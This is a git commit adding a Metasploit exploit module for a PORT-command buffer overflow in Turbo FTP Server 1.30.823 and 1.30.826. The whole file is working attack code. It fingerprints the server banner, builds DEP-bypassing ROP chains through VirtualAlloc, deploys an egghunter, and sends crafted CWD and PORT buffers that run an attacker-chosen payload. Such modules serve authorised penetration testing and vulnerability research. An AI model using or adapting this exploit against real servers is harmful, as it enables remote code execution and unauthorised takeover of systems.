turboftp exploit

lincoln@corelan.be · lincoln@corelan.be · commit b80b91f6b9a0 · 2012-10-19T11:05:44.000-07:00
diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb
@@ -0,0 +1,206 @@
+##
+#
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Ftp
+	include Msf::Exploit::Remote::Egghunter
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Turbo FTP Server 1.30.823 PORT Overflow',
+			'Description'    => %q{
+				This module exploits the buffer overflow found in the PORT
+				command in Turbo FTP Server 1.30.823 & 1.30.826.
+			},
+			'Author'         => 	[
+						'Zhao Liang',	 #Initial Descovery
+						'Lincoln',	 #Metasploit
+						'corelanc0d3r',	 #Metasploit
+						'thelightcosine',#Metasploit
+						],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$',
+			'Platform'       => [ 'win' ],
+			'References'     =>
+				[
+					[ 'OSVDB', '85887' ],
+				],
+			'Payload'	=>
+					{
+						'BadChars'        => "\x00",
+						'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
+						'EncoderOptions' =>
+							{
+								'BufferRegister' => 'EDI',
+							}
+
+					},
+			'Targets'	=>
+				[
+					[ 'Automatic', {} ],
+					['Windows Universal TurboFtp 1.30.823',
+						{
+							'Ret'		=> 0x00411985,	# RETN (ROP NOP) [tbssvc.exe]
+							'ver'		=> 823
+						},
+
+					],
+					[ 'Windows Universal TurboFtp 1.30.826',
+						{
+							'Ret'		=> 0x004fb207,	# RETN (ROP NOP) [tbssvc.exe]
+							'ver'		=> 826
+						},
+					],
+				],
+
+			'DisclosureDate' => 'Oct 03 2012',
+			'DefaultTarget' => 0))
+	end
+
+	def check
+		connect
+		disconnect
+		if (banner =~ /1\.30\.823/)
+			return Exploit::CheckCode::Vulnerable
+		elsif (banner =~ /1\.30\.826/)
+			return Exploit::CheckCode::Vulnerable
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+
+	def create_rop_chain(ver)
+
+		# rop chain generated with mona.py - www.corelan.be
+		if ver == 823
+			rop_gadgets =
+			[
+				0x004b692a,	# POP ECX # RETN [tbssvc.exe]
+				0x005f6074,	# ptr to &VirtualAlloc() [IAT tbssvc.exe]
+				0x0046f82a,	# MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
+				0x00423b95,	# XCHG EDX,EDI # RETN [tbssvc.exe]
+				0x00423a27,	# XCHG ESI,EDI # RETN [tbssvc.exe]
+				0x005d1c99,	# POP EBP # RETN [tbssvc.exe]
+				0x004cad5d ,	# & jmp esp [tbssvc.exe]
+				0x004ab16b,	# POP EBX # RETN [tbssvc.exe]
+				0x00000001,	# 0x00000001-> ebx
+				0x005ef7f6,	# POP EDX # RETN [tbssvc.exe]
+				0x00001000,	# 0x00001000-> edx
+				0x005d7139,	# POP ECX # RETN [tbssvc.exe]
+				0x00000040,	# 0x00000040-> ecx
+				0x004df1e0,	# POP EDI # RETN [tbssvc.exe]
+				0x00411985,	# RETN (ROP NOP) [tbssvc.exe]
+				0x00502639,	# POP EAX # RETN [tbssvc.exe]
+				0x90909090,	# nop
+				0x00468198,	# PUSHAD # RETN [tbssvc.exe]
+			].flatten.pack("V*")
+
+		elsif ver == 826
+			rop_gadgets =
+			[
+				0x0050eae4,	# POP ECX # RETN [tbssvc.exe]
+				0x005f7074,	# ptr to &VirtualAlloc() [IAT tbssvc.exe]
+				0x004aa7aa,	# MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]
+				0x00496A65,	# XOR EAX,EAX [tbssvc.exe]
+				0x004badda,	# ADD EAX,EDX # RETN [tbssvc.exe]
+				0x00411867,	# XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]
+				0x00000001,	# 0x00000001-> ebx
+				0x0058a27a,	# POP EBP # RETN [tbssvc.exe]
+				0x004df7dd,	# & call esp [tbssvc.exe]
+				0x005f07f6,	# POP EDX # RETN [tbssvc.exe]
+				0x00001000,	# 0x00001000-> edx
+				0x004adc08,	# POP ECX # RETN [tbssvc.exe]
+				0x00000040,	# 0x00000040-> ecx
+				0x00465fbe,	# POP EDI # RETN [tbssvc.exe]
+				0x004fb207,	# RETN (ROP NOP) [tbssvc.exe]
+				0x00465f36,	# POP EAX # RETN [tbssvc.exe]
+				0x90909090,	# nop
+				0x004687ff,	# PUSHAD # RETN [tbssvc.exe]
+			].flatten.pack("V*")
+		end
+		return rop_gadgets
+
+	end
+
+	def exploit
+
+		my_target = target
+		if my_target.name == 'Automatic'
+			print_status("Automatically detecting the target")
+			connect
+			disconnect
+
+			if (banner =~ /1\.30\.823/)
+				my_target = targets[1]
+			elsif (banner =~ /1\.30\.826/)
+				my_target = targets[2]
+			end
+			if (not my_target)
+				print_status("No matching target...quiting")
+				return
+			end
+			target = my_target
+		end
+
+		print_status("Selected Target: #{my_target.name}")
+		connect_login
+
+		rop_chain = create_rop_chain(target['ver'])
+		rop = rop_chain.unpack('C*').join(',')
+
+		eggoptions =
+			{
+			:checksum => true,
+			:eggtag => 'w00t',
+			:depmethod => 'virtualalloc',
+			:depreg => 'esi'
+			}
+		badchars = "\x00"
+		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
+
+		speedupasm = "mov edx,eax\n"
+		speedupasm << "sub edx,0x1000\n"
+		speedupasm << "sub esp,0x1000"
+		speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_string
+
+		fasterhunter = speedup
+		fasterhunter << hunter
+
+		print_status("Connecting to target #{target.name} server")
+
+		buf1 = rand_text_alpha(2012)
+		buf1 << egg
+		buf1 <<	rand_text_alpha(100)
+
+		buf2 = rand_text_alpha(4).unpack('C*').join(',')
+		buf2 << ","
+		buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eip
+		buf2 << ","
+		buf2 << rop
+		buf2 << ","
+		buf2 << fasterhunter.unpack('C*').join(',')
+		buf2 << ","
+		buf2 << rand_text_alpha(90).unpack('C*').join(',')
+
+		send_cmd( ['CWD', buf1], true );
+		send_cmd( ['PORT', buf2], true );
+
+		print_status("Egghunter deployed, locating shellcode")
+
+		handler
+		disconnect
+	end
+
+end
